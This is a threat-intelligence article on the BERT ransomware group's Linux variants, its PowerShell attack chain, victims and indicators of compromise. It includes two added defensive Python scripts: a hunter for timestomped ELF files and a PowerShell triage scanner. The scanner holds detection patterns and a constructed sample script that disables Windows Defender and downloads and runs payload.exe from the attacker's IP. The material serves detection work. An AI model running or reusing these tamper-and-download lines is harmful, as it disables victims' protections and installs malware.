First observed in March 2025 targeting Windows systems, the BERT ransomware group escalated its operations in May 2025 by launching attacks on Linux machines.
Analysis of two Linux-focused ELF samples reveals an 80% codebase overlap with Sodinokibi (REvil) ransomware, a notorious group linked to Russian cybercriminals.
The Linux variants employ sophisticated encryption methods, including AES, RC4 PRGA, Salsa20, and ChaCha20 algorithms, as well as Base64 encoding, to obfuscate payloads.
Unlike its Windows counterpart, which appends unique extensions like “.encryptedbybert3,” the Linux version utilizes AWK commands to query system registries, suggesting a hybrid approach that combines old and new tactics.
Security researchers note that BERT’s Linux samples are designed for stealth, with timestamps manipulated to future dates (e.g., 2047, 2076) to evade detection.
One sample (MD5: 00fdc504be1788231aa7b7d2d1335893) retained a legitimate May 20, 2025, timestamp, confirming recent activity.
The ransomware’s PowerShell scripts further weaken systems by disabling Windows Defender, firewalls, and User Account Control (UAC) before deploying payloads from a Swedish IP (185.100.157.74) linked to Russian firm Edinaya Set Limited.
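The future-dated timestamps described above (2047, 2076) are a practical hunt lead on Linux hosts. The script below is an added example, not code from the article or from the researchers it cites: it walks a directory, keeps only files with an ELF magic header, flags a modification time later than now (plus a clock-skew allowance) or far later than the inode change time, and compares MD5 hashes against a watch-list seeded with the hash published in the article. The sample files created by build_demo() are constructed for the demo.

```python
"""Hunt for ELF files whose timestamps were pushed into the future.

Added example; not code from the article or from any vendor it cites.
ctime cannot be set with utime(), so an mtime years past ctime is an
extra timestomping signal alongside a plainly future-dated mtime.
"""
import hashlib
import os
import shutil
import tempfile
import time
from datetime import datetime, timezone

ELF_MAGIC = b"\x7fELF"

# Seeded with the MD5 from the article's IoC list; extend as hashes are published.
WATCHLIST_MD5 = {"00fdc504be1788231aa7b7d2d1335893"}

SKEW_SECONDS = 24 * 3600          # tolerate a day of clock drift between hosts
CTIME_GAP_SECONDS = 365 * 86400   # mtime more than a year past ctime is suspicious


def is_elf(path):
    """True if the file starts with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def md5_of(path):
    """Stream the file through MD5 (used only for IoC matching, not integrity)."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hunt(root, now=None):
    """Return [(path, [reasons])] for every ELF file under root that trips a check."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not is_elf(path):
                continue
            st = os.stat(path)
            reasons = []
            if st.st_mtime > now + SKEW_SECONDS:
                when = datetime.fromtimestamp(st.st_mtime, timezone.utc).date()
                reasons.append("mtime in the future: %s" % when)
            if st.st_mtime - st.st_ctime > CTIME_GAP_SECONDS:
                reasons.append("mtime far later than ctime (timestomp signal)")
            digest = md5_of(path)
            if digest in WATCHLIST_MD5:
                reasons.append("md5 on watch-list: " + digest)
            if reasons:
                findings.append((path, reasons))
    return findings


def build_demo(root):
    """Create constructed samples: a future-dated ELF, a normal ELF and a text file."""
    os.makedirs(root, exist_ok=True)
    stomped = os.path.join(root, "newcryptor")
    with open(stomped, "wb") as fh:
        fh.write(ELF_MAGIC + b"\x00" * 60)      # minimal fake ELF header (constructed)
    year_2047 = datetime(2047, 1, 1, tzinfo=timezone.utc).timestamp()
    os.utime(stomped, (year_2047, year_2047))  # mimic the reported future timestamps
    with open(os.path.join(root, "benign"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x00" * 60)
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write("not an ELF file\n")


def demo():
    """Build the constructed samples in a temp dir, hunt them, return {name: reasons}."""
    root = tempfile.mkdtemp(prefix="bert_hunt_")
    try:
        build_demo(root)
        return {os.path.basename(p): r for p, r in hunt(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

Point hunt() at /tmp, /dev/shm, /var/tmp and user home directories on a live host; the ctime gap check still fires after the host clock has been corrected, when the plain "future mtime" check no longer would.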
Multi-Stage Attacks: PowerShell Scripts and Russian Infrastructure
BERT’s attack chain begins with a malicious PowerShell script (start.ps1) hosted on the same server as its payloads. The script performs three critical actions:
- Disables the WinDefend and Sense services (Windows Defender and the Defender ATP sensor).
- Downloads payload.exe from http://185.100.157.74 and executes it.

The use of Russian infrastructure aligns with historical ransomware trends, where threat actors leverage local providers to blend into “bad traffic.”
The Linux payloads, while borrowing heavily from REvil, introduce novel encryption layers, making decryption nearly impossible without the attackers’ RSA keys.
Global Impact and Mitigation Strategies
BERT has targeted organizations in the U.S., UK, Malaysia, Taiwan, Colombia, and Turkey, with the service and manufacturing sectors most affected.
Victims’ data is leaked on a Tor-based site (wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion) in zipped archives labeled “part1,” “part2,” etc. Negotiations occur via the privacy-focused Session messaging app, with ransoms demanded in Bitcoin (e.g., 1.5 BTC for a recent victim).
Key Recommendations for Defense:
- Monitor for changes to HKLM\SOFTWARE\Policies\Microsoft\Windows Defender.
- Block traffic to 185.100.157.74 and inspect PowerShell scripts for privilege escalation attempts.

The BERT group’s blend of recycled REvil code and custom .NET-based Windows tools underscores the evolving threat of cross-platform ransomware.
As investigations continue, organizations are urged to prioritize patch management and network segmentation to limit lateral movement.
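The recommendation to inspect PowerShell scripts can be turned into a simple triage pass. The following Python is an added example, not the article's or any vendor's tool: its indicator list is built from details on this page (the Defender policy key, the 185.100.157.74 host, the WinDefend and Sense services) plus two well-known Windows settings (EnableLUA for UAC, netsh advfirewall for the firewall), and both scripts it scans are constructed for the demo, in the style of the start.ps1 described above rather than copies of it.

```python
"""Triage PowerShell scripts for the Defender-tampering, C2 and
download-and-run patterns described in the article.

Added example; not the article's or any vendor's tool. SAMPLE_SCRIPT and
BENIGN_SCRIPT are constructed for the demo.
"""
import re

INDICATORS = [
    ("defender_policy_key",
     re.compile(r"HKLM[:\\]+SOFTWARE\\Policies\\Microsoft\\Windows Defender", re.I)),
    ("defender_service_stop",
     re.compile(r"\b(Stop-Service|Set-Service|sc(\.exe)?\s+(stop|config))\b.*\b(WinDefend|Sense)\b", re.I)),
    ("c2_host", re.compile(r"\b185\.100\.157\.74\b")),             # host named in the article
    ("uac_disable", re.compile(r"\bEnableLUA\b", re.I)),             # UAC policy value
    ("firewall_off", re.compile(r"netsh\s+advfirewall\b.*\boff\b", re.I)),
    ("download_exec",
     re.compile(r"\b(DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer|iwr)\b.*\.exe\b", re.I)),
]

SAMPLE_SCRIPT = r"""
# constructed sample in the style of the start.ps1 described above, not the real script
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1
Stop-Service -Name WinDefend -Force
(New-Object Net.WebClient).DownloadFile('http://185.100.157.74/payload.exe', 'C:\Users\Public\payload.exe')
"""

BENIGN_SCRIPT = r"""
# constructed benign admin script
Get-MpPreference | Select-Object DisableRealtimeMonitoring
Invoke-WebRequest -Uri https://updates.example.internal/inventory.zip -OutFile C:\temp\inventory.zip
"""


def triage(script_text):
    """Return {indicator_name: [line numbers]} for every indicator that fires."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def verdict(hits):
    """Escalate on the known host, or when three tamper/download categories co-occur."""
    if "c2_host" in hits or len(hits) >= 3:
        return "high"
    if hits:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = triage(text)
        print(label, verdict(hits), hits)
```

The categories are scored together rather than individually because a lone Stop-Service or Invoke-WebRequest is routine in administration scripts; the combination of Defender tampering with a download of an executable is what the article's chain looks like.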
Indicators of Compromise:
- MD5: 00fdc504be1788231aa7b7d2d1335893 (timestomped sample)
- Files: newcryptor.exe, ESXDSC04_bert11, note.txt (ransom note)

The BERT group’s shift to Linux underscores the critical need for cross-platform threat hunting. With its REvil-inspired code and adaptive infrastructure, organizations must adopt proactive defenses to mitigate this dual-OS threat.